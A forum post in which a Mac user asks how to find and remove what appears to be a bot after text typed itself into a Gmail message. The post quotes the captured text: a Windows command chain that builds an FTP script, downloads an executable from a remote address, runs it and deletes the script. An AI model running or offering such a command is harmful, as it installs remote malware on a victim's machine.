Hello all,
I think I may have acquired a spybot and I would like to know what options I know have. I am on MacBook running 10.5.8, Firefox 3.6.13 with Adblock.
This morning I was writing an email in Gmail when text started writing itself in my message. This occurred twice. I was none too swift and only saved a little snatch of the text.
"md.exe del eq&echo open 172.19.14.68 6577 >> eq&echo user 5946 28561 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq j"
I was using Firefox. In my url bar was "systmr".
I did a Google search and found out that this was bot, but thankfully for a windows.exe.
I ran MacScan in demo mode but it didn't really return anything.
I am a newbie when it comes to this kind of thing, how would I search out and remove this script (or whatever it is?).
Thanks
